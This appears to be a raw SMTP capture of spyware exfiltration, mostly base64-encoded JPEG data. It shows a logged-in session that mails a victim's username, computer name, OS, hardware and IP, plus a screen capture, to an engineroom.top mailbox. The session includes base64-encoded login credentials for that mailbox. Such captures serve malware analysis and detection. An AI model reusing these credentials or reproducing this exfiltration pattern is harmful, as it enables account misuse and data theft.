gAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigArobvVbW6tTaGRERbWHbIse0s6KN0b\r\nEDJBPTOQCBXPUUAdfea5ZTX0Dia2NsrsYdqTGS2JQhSVbKgKcHCegwKqWVyJmuRqF81/HbBb\r\ntZsuwLLxsy4BwcgdOwrm6kFxMLc24mkEBbcY9x2lvXHTNAGvPqJudJQR6iYH+c3Nud4Nw5bO\r\n7Kgg8ED5iMba1W12zzf/AGae2Rpbl3JuFmCzRkAAfJ1xzwwxz9a4+ihgbehXsVvYXkTXVtby\r\nySRMhuIDKpC7s8bW55FXoNZ0+KfzIZWjUXNzIodWYgPEFUnrnLe5965aih6gjS1a+F/b2DyT\r\nNNdJCUmd8lid7EZJ68EVm0UUAFFFFAElukclxGk0vlRswDybd20Z5OB1xXUR3kdno2n+ZfAQ\r\nG2nVrbY2bjLuF7Yxn1PHauTpzSyOiI7syoMICchRnPHpzQ9VYDoZ9ahmtpbV7hntvsEKJEQd\r\nvmrszxjrw3P61Y1e6FzoV9LHffaLd7qIQR7GUQjDHZyABgY4GR+dcpVi6vry8CC7up5wn3RL\r\nIW2/TPSh6gtCvRRRQAVe0mUw3Dst7FanZg+dGXSQd1YANn8RjiqNFAHWwappcSlba4gggS8a\r\nUxvAzOyFVB8s7SVJIbHzKRxzVO0vNPJ0y4e6EP8AZ7sTAyMWcBy67SARznHJFc9RQHkb1vrM\r\nUOlB1Yi/jmwigHHllxJ1/wB5cfjUkuoacuvLcW8n+i2UJNsCh+d+WAx2+djyfSudooA2tJvr\r\nSzt5Fnkd2viYpypYeVH6+5yc9+AR3q/LrFoLQLLdfa4FgiiFltdQXQqC+SMAEKeevOCK5aig\r\nDe1W90/VVssSS27KkrSs58zaxZmC8Kuck9RwM+1ZcsFokDNHeeZIBGQnlEZJB3DP+ycD3zVW\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACirX9nXf/PL\r\n/wAeH+NH9nXf/PL/AMeH+NTzx7m/1at/I/uZVoq1/Z13/wA8v/Hh/jR/Z13/AM8v/Hh/jRzx\r\n7h9WrfyP7mVaKtf2fdf88v8Ax4f41FNbywbfNXbu6cg0KUXsyZUakVeUWl6EVFFFUZBRRRQA\r\nUUuCexo2n0NACUUu0+hpKACiiigAooooAKKKOtABRS7T6GjafQ0AJRRgjqKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAOmzS7qjzRmv\r\nOsfY8xMI5WiaVY3Ma8M4U4H1NMzW3pIV9InlJ+S3jmDj3ZVC/rn8qwN1U42MoVuZtdh+azNY\r\nOfJ/4F/Sr+aztWOfK/H+lXSXvo5sdK9CXy/NGfRRRXYfOBRRUkFvLcybIULtjOPahuw0m3ZH\r\npvwy/wCRdn/6+m/9BSuskkSJC8jBVHUk1xHgvUItE0aS3vEk81py4VADwVUevsa0ZtWt9TvY\r\nITFMEZwgG8ADJxnoc1HtI9zVYeo1exv/AG+JoPNhPmLu2nqOcZrlfEfhVNbs21CwQJfBnJXo\r\nJhuPB/2vQ/gfbV01ozpzRtNFG3mlsO4HGBVyztlMnyXIdASWWOdsDPsD60XfN5EWi4+Z4pIj\r\nxSNHIrI6khlYYII7EU2us+I9vFb+IIjEuDJbq7kkksdzDJz7AflXJ1ZAUUUUAFaPh3/kYtM/\r\n6+ov/QhWdWxoVncRarY3jxkQRzRyFsj7oIPT6Um0tyoxlLSKue0VXkvbeOZYWlHmMQAo55/p\r\nWRP4otdjLFHMWIwGwBj9ao2kkMklrcqHQGfDGRwem05zgetSpxbsmXKjOK5pLQ2b9LbUmWwu\r\n4BJE7spB74VufY15h4o8NXGgXf8AFLZyH91Lj/x1vf8An+YHpcyQySlxeQD5iykTYI/L603X\r\nLGN/DV+txulK28jfNIxGQCQeT2IFEW+pM1HdHjNFFFWQFFFFABRRRQAUUUUAFFFFABRRRQAU\r\nUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFF\r\nABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAU\r\nUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFF\r\nABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAU\r\nUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFF\r\nABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAU\r\nUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFF\r\nABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRU9laS313FawY8yU7V3HAzQBsbqN1aEmh3cT7\r\nJZbVHxna06g/zq5ZaTDbpHc3pikhD4kk80MiYGcAKcliB3x9DXL7KXY+geMpdHcfaqLTRI4H\r\nid31FtzKi5ZY1+6QP97n3xWZcaZdW8hSQRr3UtIq7h6jJBo1TWJ9QuHIdo7f7scKnCqo6DFV\r\n4L6SFPLZUlizny5VyAfbuPwpO2wR5173VjZo5IJNkqMjdcEdqzNTOfK/H+lal9fS30yyShF2\r\nIEREGFVR0ArK1E58v8f6VUF7xlipN0Hfy/MpUUUV0niBWp4e/wCP5/8Arkf5isutTw9/x/P/\r\nANcj/MVFT4GbYf8AixO10/S4ruzNxLdiAeb5QBTOTgHrn3pkVq9lr0FvIQWSdOR35BFWrC+i\r\ns9DbKwyyi53LHIenyj5sVTtriS61u3nlILvOhOPqK5Pd0tuemnNuV9tSdUZ2CopZj2Aya6XS\r\nLJrS3YycSSHJHoOwqXzpf+ett/30aPOl/wCett/30a7OZHk8jPO/id/yMFv/ANeq/wDobVx1\r\ndj8Tv+Rgt/8Ar1X/ANDauOqiAooooAK7TSIftEVlDu2+YI0zjOM4FcXXb6Cyo+nM7BVUxEkn\r\nAA4rCv0O3Buzlbsal9oy21tLNDdrOIX2SLs2lT09abbf8guP/rs//oKVJrGqGZ57WBIlhaQl\r\nmj6yY7k1peGXdNMfY0S5mb75x/CtRDlU9Darzuj7xX07T5LuZSVIhByzEdfYVs6//wAi/qX/\r\nAF6y/wDoBqXzpf8Anrbf99GqusO7+H9T3tE2LWT7hz/Aa6FJM85xaPFKKKKokKKKKACiiigA\r\nooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKK\r\nKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigA\r\nooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKK\r\nKACiiigAooooEHLO Host\r\nAUTH login ZnJhbmtsb2dzQGVuZ2luZXJvb20udG9w\r\nNTY2MjIwNWFjZUFDRQ==\r\nMAIL FROM:<franklogs@engineroom.top>\r\nRCPT TO:<frankjoe@engineroom.top>\r\nDATA\r\nMIME-Version: 1.0\r\nFrom: franklogs@engineroom.top\r\nTo: frankjoe@engineroom.top\r\nDate: 27 Jun 2019 05:35:29 -0700\r\nSubject: user/Host Screen Capture\r\nContent-Type: multipart/mixed; boundary=--boundary_4_b8ac891c-3382-4d26-9140-48f5cdfbc433\r\n\r\n\r\n----boundary_4_b8ac891c-3382-4d26-9140-48f5cdfbc433\r\nContent-Type: text/html; charset=us-ascii\r\nContent-Transfer-Encoding: quoted-printable\r\n\r\nTime: 06/27/2019 05:26:46<br>UserName: user<br>ComputerName: Host<br>OSFullName:=\r\n Microsoft Windows 7 Enterprise N <br>CPU: Intel(R) Core(TM)CPU E5-2670=\r\n 0 @ 2.60GHz<br>RAM: 4095.55 MB<br>IP: 0.0.0.0=0A<hr>\r\n----boundary_4_b8ac891c-3382-4d26-9140-48f5cdfbc433\r\nContent-Type: application/octet-stream; name=YeC4IsL8p6.jpeg\r\nContent-Transfer-Encoding: base64\r\n\r\n/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9\r\nPDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhC\r\nY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wAAR\r\nCAPCB4ADASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAA\r\nAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkK\r\nFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWG\r\nh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl\r\n5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREA\r\nAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYk\r\nNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOE\r\nhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk\r\n5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwDz+iiigAorX8OabBqd1JFKcuq7kQttDeuT\r\nXU/8I5JAv7vRLdx679/8zTSE2ef0V3E2myovz6NBGPXyQP51Qayh34aK3U+h2CnyhzHLUV15\r\n0GxktJZpxHbqqlvMST29OhrkKkYUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUV0Hg2wi1DVh\r\nHMOAR/Ik/wAqUnZXNKcOeVr2/wCBqc/RXtH/AAj+mf8APt/5Eb/Gj+wNM/59v/Ijf41N5dvx\r\n/wCAXy0f5n9y/wDkjxeivZJ/DemzQsiwmMnuGJ/Q5rzTxDoM+kXTAqTF1BHp/hRzNOzB0otX\r\npu9vK36sxqKKKswCiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooo\r\noAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAC\r\niiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooo\r\noAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAC\r\niiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooo\r\noAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAC\r\niiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooo\r\noAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAC\r\niiigAooooA1vDE3la5b56PlfzFb2p3EkNyNkrp/usRXJ6fL5F/by5xtkB/Wu1v5reAhZlXdI\r\n3GQOR61pTV3YiehlNezuMNPIw9C5NSWb7pGye1Ub0xxTkRsCDzgdqfYzKpdmYBQOSaqWjsSt\r\ndR2sv+4kJPOMVzlaurStJHvOVVjhVPXHqayqyZogooopDCvQvh9Z6dLoNzPf21q+252+ZPGp\r\nwNq4GT7n9a89rtvDoB+H2qAgEfaRwTj/AJ50m7K5UFzSSJrzWLRL+aO00fSmgQlVL2o3ZHrz\r\nVdtbTDEaNo4GQATa+2T3qnp8IkvEBYLz3YNx6H2rQ1jS7aGGNoJSAOobnt14+lcMsRaai3ue\r\nnyUotRcTa0690G/aGGPSbYzupL4tFCqR61rw6TpkiknTLLg9rdf8K4HSp72C9VbC5jEknyjP\r\nP6EV6ALgSSrArgTBAWA4BPfFdMZ9zjxFJQl7pWfTNNMU3/EtshhGIIgX/CvHa9sa4hmgnWI5\r\nZUIPGO1eJ1pFpq6dzms1owoooqgCur+Hn/IbH+f4WrlK6v4ef8hsf5/haont935m9D436S/J\r\nnqFZd9dXEOowJHJhGeNdm0fMGLZOevGBWk7rGhZ2CqOSScAVhXNxJeams9lC862w2xsoG0sf\r\nvZJ9uKU3ZFYaHNJtrS3U36x/FFvHNo8jyKCYyCD9SAR+tOk1ryiu+BVO8I0ZkxIvvtxz+Bp/\r\niL/kCXH/AAH/ANCFEpKUXYqjTnTrQcurR4vRRRWhyBRRRQAUUUUAFFFFABRRRQAUUUUAFFFF\r\nABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAU\r\nUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFF\r\nABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAU\r\nUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFF\r\nABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAU\r\nUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFF\r\nABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAU\r\nUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAKDgg+lddrRS7021m81UcBflJH8WBXIV6H4Zg\r\ntrvSrOUxRPIgILSAHoSOM1SdhNXOfltlhtWiYA4B+ZRyff61T09BJKfMB+XHyn1r03yUTlY0\r\nU4xlVANVJrZfKkMoWQHsy1dSopWsrWJjFrc841p8yovoM1m1o6+oj1aWNRgJgY9OM1nVkWFF\r\nFFABXc+F0kl8B6mkMfmSNcgBcZ/uVw1elfDZ9nh+6YjOLk/+grSew4vlaZhREwExyBty5354\r\nPHp6U+eT5HKFt4ZsAt0UelbV94du7y6vL1XUvLJ8instR6noBW0iezDvKrZkyfzrjlRs+Y9S\r\nOIpO19zKs9Pml2XcRWIhshvX3xW8bwR3TOzjcwUA/Xg/yNQJb/ZrcQoWIHNcdfC6N7IJFcyF\r\nvfp2xXHBPEN62SJrTtra56NaOGjmKngxN+NeRV6d4fjlispVnJ8zymyD1rzGu7Bq1K3mcVf4\r\nwooorrMQrq/h5/yGx/n+Fq5Sur+Hn/IbH+f4WqJ7fd+ZvQ+N+kvyZ6Lf2bXYi2TeWY23DKbh\r\n0x09altreO1gWKMHaO56k9yfeotWR5NIvUjVmdoHCqoySdp4Fc7NpckDwGe0MiOkpWK3RmWJ\r\niqBcHHykkE54qrK9zNzk48vQ6sopYMVBYdCR0rO8Rf8AIEuP+A/+hCqmgWFzDd3FxeRx+bkK\r\nZGjPmMdiZIbONuc9utW/EX/IEuP+A/8AoQqZ/CzTD/xoeq/M8XoooqzAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiitObRJYbRphc28jrCk7wqW3qj\r\nYweVAP3h0JoAzK3NB8RyaQhhkgW4tyc7ScFT7GsOigDu7nxrpsttiG2uYZsdQFxn65rAPiKQ\r\nS+YPMlYdPNbj8qwxycVPfWkljezWspUyRMVYqeCR6UAMnmkuZ5JpW3SSMWY+5qOrtjppvLea\r\ndrqC2ihZVZpt/JbOMbVPoaivLN7OWSGZ086ORo3jGcjHfOMYP1oAr0UUUAFdL4a8WDQbCW1N\r\niLgSS+ZuMu3HAGMbT6VzVFAHeD4kADA0gAe1x/8AY0w/ERCMHR1x/wBd/wD7CuGopNJgdsfH\r\n0B/5gcf/AH+H/wARTP8AhOrXcW/sGHce/mjP/oFcZRS5I9h8z7nanx8nlsiaQqZUrxP0/wDH\r\na4qiimklohXuFFFWrKya881vNjhihXfJLJnaoyAOgJPJA4FMCrWjomqvpN556Z+oHI/zk1Jb\r\n6E9wisl7aDzJjBECX/esADxhcDO4dcfhUC6VcNLYx7ow16dseSflO8p83HqPek1fQqE3B8yO\r\nsHxElx/x7qf+Af8A2VH/AAsSX/n2T/vg/wDxVcvHol1LeRW0bRF5YjKrZO3AyMdOuQR9cU22\r\n0ozwwSSXlvbm4JESSCQs2Dj+FT3pKPmautb7K+46r/hYkv8Az7J/3wf/AIqqeqeN5b+0aDyg\r\nuecBcAn35NYZ0S48/wAqOWGUi4NuzIxwrDucjpgE59jUVxpxtrVZpbqAM43RxfNvdc4DD5cA\r\nHryQfalyprcaruLukk/QpUVbvtOnsI7Z5yv+kx+Yqg8gZxz71UqznCiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigArobvVbW6tTaGRERbWHbIse0s6KN0b\r\nEDJBPTOQCBXPUUAdfea5ZTX0Dia2NsrsYdqTGS2JQhSVbKgKcHCegwKqWVyJmuRqF81/HbBb\r\ntZsuwLLxsy4BwcgdOwrm6kFxMLc24mkEBbcY9x2lvXHTNAGvPqJudJQR6iYH+c3Nud4Nw5bO\r\n7Kgg8ED5iMba1W12zzf/AGae2Rpbl3JuFmCzRkAAfJ1xzwwxz9a4+ihgbehXsVvYXkTXVtby\r\nySRMhuIDKpC7s8bW55FXoNZ0+KfzIZWjUXNzIodWYgPEFUnrnLe5965aih6gjS1a+F/b2DyT\r\nNNdJCUmd8lid7EZJ68EVm0UUAFFFFAElukclxGk0vlRswDybd20Z5OB1xXUR3kdno2n+ZfAQ\r\nG2nVrbY2bjLuF7Yxn1PHauTpzSyOiI7syoMICchRnPHpzQ9VYDoZ9ahmtpbV7hntvsEKJEQd\r\nvmrszxjrw3P61Y1e6FzoV9LHffaLd7qIQR7GUQjDHZyABgY4GR+dcpVi6vry8CC7up5wn3RL\r\nIW2/TPSh6gtCvRRRQAVe0mUw3Dst7FanZg+dGXSQd1YANn8RjiqNFAHWwappcSlba4gggS8a\r\nUxvAzOyFVB8s7SVJIbHzKRxzVO0vNPJ0y4e6EP8AZ7sTAyMWcBy67SARznHJFc9RQHkb1vrM\r\nUOlB1Yi/jmwigHHllxJ1/wB5cfjUkuoacuvLcW8n+i2UJNsCh+d+WAx2+djyfSudooA2tJvr\r\nSzt5Fnkd2viYpypYeVH6+5yc9+AR3q/LrFoLQLLdfa4FgiiFltdQXQqC+SMAEKeevOCK5aig\r\nDe1W90/VVssSS27KkrSs58zaxZmC8Kuck9RwM+1ZcsFokDNHeeZIBGQnlEZJB3DP+ycD3zVW\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACirX9nXf/PL\r\n/wAeH+NH9nXf/PL/AMeH+NTzx7m/1at/I/uZVoq1/Z13/wA8v/Hh/jR/Z13/AM8v/Hh/jRzx\r\n7h9WrfyP7mVaKtf2fdf88v8Ax4f41FNbywbfNXbu6cg0KUXsyZUakVeUWl6EVFFFUZBRRRQA\r\nUUuCexo2n0NACUUu0+hpKACiiigAooooAKKKOtABRS7T6GjafQ0AJRRgjqKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAOmzS7qjzRmv\r\nOsfY8xMI5WiaVY3Ma8M4U4H1NMzW3pIV9InlJ+S3jmDj3ZVC/rn8qwN1U42MoVuZtdh+azNY\r\nOfJ/4F/Sr+aztWOfK/H+lXSXvo5sdK9CXy/NGfRRRXYfOBRRUkFvLcybIULtjOPahuw0m3ZH\r\npvwy/wCRdn/6+m/9BSuskkSJC8jBVHUk1xHgvUItE0aS3vEk81py4VADwVUevsa0ZtWt9TvY\r\nITFMEZwgG8ADJxnoc1HtI9zVYeo1exv/AG+JoPNhPmLu2nqOcZrlfEfhVNbs21CwQJfBnJXo\r\nJhuPB/2vQ/gfbV01ozpzRtNFG3mlsO4HGBVyztlMnyXIdASWWOdsDPsD60XfN5EWi4+Z4pIj\r\nxSNHIrI6khlYYII7EU2us+I9vFb+IIjEuDJbq7kkksdzDJz7AflXJ1ZAUUUUAFaPh3/kYtM/\r\n6+ov/QhWdWxoVncRarY3jxkQRzRyFsj7oIPT6Um0tyoxlLSKue0VXkvbeOZYWlHmMQAo55/p\r\nWRP4otdjLFHMWIwGwBj9ao2kkMklrcqHQGfDGRwem05zgetSpxbsmXKjOK5pLQ2b9LbUmWwu\r\n4BJE7spB74VufY15h4o8NXGgXf8AFLZyH91Lj/x1vf8An+YHpcyQySlxeQD5iykTYI/L603X\r\nLGN/DV+txulK28jfNIxGQCQeT2IFEW+pM1HdHjNFFFWQFFFFABRRRQAUUUUAFFFFABRRRQAU\r\nUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFF\r\nABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAU\r\nUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFF\r\nABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAU\r\nUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFF\r\nABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAU\r\nUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFF\r\nABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRU9laS313FawY8yU7V3HAzQBsbqN1aEmh3cT7\r\nJZbVHxna06g/zq5ZaTDbpHc3pikhD4kk80MiYG